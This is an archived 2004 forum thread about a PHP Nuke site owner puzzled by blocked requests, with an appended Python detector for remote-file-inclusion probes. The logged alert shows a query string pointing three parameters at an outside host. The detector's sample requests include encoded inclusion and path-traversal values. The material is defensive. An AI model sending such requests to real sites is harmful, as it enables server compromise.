Hack Attempt

Some sort of PHP Script to Hack my site?



10:04 am on Jul 8, 2004 (gmt 0)

10+ Year Member


I've been receiving several notifications like the following ... with [217.XX.104.226...] in the url ... and just am curious if anyone knows what they are attempting to do?

Date & Time: 2004-07-08 02:30:56
Blocked IP: unknown...
User ID: Anonymous (1)
Reason: Abuse - OTHER
User Agent: curl/7.11.2 (i386-pc-linux-gnu) libcurl/7.11.2 OpenSSL/0.9.7 ipv6 zlib/
Query String: newbiehangout.com/modules.php?name=http://217.XX.104.226/&file=http://217.XX.104.226/&func=http://217.XX.104.226/
Forwarded For: unknown
Client IP: none
Remote Address: 62.2XX.221.7
Remote Port: 57529
Request Method: GET
Who-Is for IP
OrgName: Unknown Works
Address: 3928 SE Tolman st
City: Portland
StateProv: OR
PostalCode: 97202
Country: US

NetRange: 63.2XX.164.144 - 63.2XX.164.151
CIDR: 63.2XX.164.144/29
NetHandle: NET-63-2XX-164-144-1
Parent: NET-63-2XX-0-0-1
NetType: Reassigned
RegDate: 2000-11-16
Updated: 2000-11-16

TechHandle: IO-ORG-ARIN
TechName: Internet Operations, XXYY
TechPhone: +1-800-672-8520
TechEmail: dns-info@XXYY.net

Thank you!

[edited by: DaveAtIFG at 7:37 pm (utc) on July 8, 2004]
[edit reason] No specifics please [/edit]


2:53 pm on Jul 8, 2004 (gmt 0)

10+ Year Member

Mods and/or admins.

Please delete the above post or at least edit the URLs in there. Whatever any of you do, don't enter any of the URLs.


10:58 pm on Jul 8, 2004 (gmt 0)

10+ Year Member


I'm terribly sorry.

Thanks for editing it.

Does anyone have any ideas on this though?



12:17 am on Jul 9, 2004 (gmt 0)

10+ Year Member

No problem pal.

Let's just say it's been years since I got caught out with techniques like that and it definitely "woke me up".

The URL that was in the original post led my browser to open multiple non-stop self-replicating popups with huge binary sound files.

It's a play on the old trick of doing the same but with telnet windows to consume CPU resource leading to a crash. If my memory serves me correctly it was part of the first .hta virii generator called God Message (or something similar)

Anyway...... as to the cause of why you are getting these messages. Where are you receiving them from?

A software firewall like Zone Alarm etc or in your server logs?


3:08 am on Jul 9, 2004 (gmt 0)

10+ Year Member

Hi Jason,

Thanks for letting me know.

I've been plagued with hack attempts ever since I opened up my PHP Nuke area. I was successfully hacked two times (2 days in a row) a few months ago and then I put in some major security features ... one of which is called "Sentinel" and that is the program that is sending me the alerts letting me know that someone was banned on my site.

Usually the hack alert notifications are pretty straightforward and I can easily see what they were attempting ... usually it's some sort of sql injection method or a play on the url trying to add an admin account or something. And now Sentinel is beefed up to even ban Agents or "web site grabbers".

But I just didn't understand the point of this one or what they were trying to accomplish with this. I've received tons of them in the last couple of days.

Seems kind of weird that they would be doing that to themselves ;o)

Anyway, thanks for your help and again ... sorry ... wasn't thinking when I posted that.

Take care!



9:11 am on Jul 9, 2004 (gmt 0)

10+ Year Member

It sounds as if it could be aimed at you.

Just by posting the URL to your server you are getting the alerts. If they realise this then in all honesty you (and I) are going to check it out leading to the desired result.

Or.... if newbiehangout is your site they could well be using it to mask attempts on others, as it appears from the format of the URL that it is proxying the request.

Good old fashioned social engineering technique.


3:01 am on Jul 10, 2004 (gmt 0)

10+ Year Member

Hi Again,

Yep, that's my url .... but I quit checking the attempted hacks a long time ago. They were hitting my site left and right. I've come to believe in "security through obscurity" LOL

My site was fine until I developed a couple modules for PHP Nuke ... and then the script kiddies found me and had a heyday until I installed all the security features. I still haven't added the content back to the Nuke Portal area ... I got a little nervous about re-adding it again after the first hacks. But, there haven't been any successful hacks in about 3 months now ... so I guess I just need to get over it and move on ;o) It was a good learning experience for me though. Prior to that, I knew nothing about security and I ended up paying a price for that.

It's actually almost funny now ... but then it's also terribly sad that they don't have anything better to do than to mess with other people's sites like that. And they can't even claim it's for a "cause" or anything ;) It's just malicious. And I don't even think that they really "know" what they're doing. Most of the attempts come in floods ... like after a new vulnerability is posted ...

It's like they wait for someone else to post a code and then they just copy and paste it to see if it works ;o)

Awww, well ... live and learn.

You've been a pleasure to talk to and I appreciate your help.

Take care.
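
Added example, not part of the thread and not Sentinel's code: a small check that flags requests shaped like the alert in the first post, where `name`, `file` and `func` each carry an absolute URL instead of a short module name, which is the shape of a remote-file-inclusion probe. The sample requests are constructed (192.0.2.10 is a documentation address standing in for the redacted one), and the `SAFE_NAME` allowlist pattern is an assumption about what a legitimate value looks like.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters that carried URLs in the alert quoted in the thread.
ROUTING_PARAMS = {"name", "file", "func"}
# A scheme prefix has no business in a module or file name.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?|php|data|file)\s*:", re.IGNORECASE)
# Assumption: legitimate values are short identifiers.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_\-]{1,64}$")


def _decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded schemes are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_query(query):
    """Return (param, decoded_value, reason) findings for a raw query string."""
    findings = []
    for key, raw in parse_qsl(query, keep_blank_values=True):
        value = _decode(raw)  # parse_qsl has already decoded once
        if REMOTE_VALUE.match(value) or value.startswith("//"):
            findings.append((key, value, "remote-url"))
        elif key.lower() in ROUTING_PARAMS and not SAFE_NAME.match(value):
            findings.append((key, value, "not-a-module-name"))
    return findings


# Constructed sample requests: the probe from the thread, a normal page view,
# a double-encoded variant, and a path-traversal value.
SAMPLE_REQUESTS = [
    "/modules.php?name=http://192.0.2.10/&file=http://192.0.2.10/&func=http://192.0.2.10/",
    "/modules.php?name=News&file=article&sid=42",
    "/modules.php?name=News&file=%2568ttp%3A%2F%2F192.0.2.10%2F",
    "/modules.php?name=News&file=../../config",
]


def scan(requests):
    """Map each request line to its list of findings."""
    return {r: inspect_query(urlsplit(r).query) for r in requests}


if __name__ == "__main__":
    for request, findings in scan(SAMPLE_REQUESTS).items():
        print("BLOCK" if findings else "ok   ", request, findings)
```

Rejecting anything that fails the allowlist matters more than the URL pattern itself: a check that only looks for `http://` misses other schemes and encodings, while a short-identifier allowlist on the routing parameters rejects them all.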


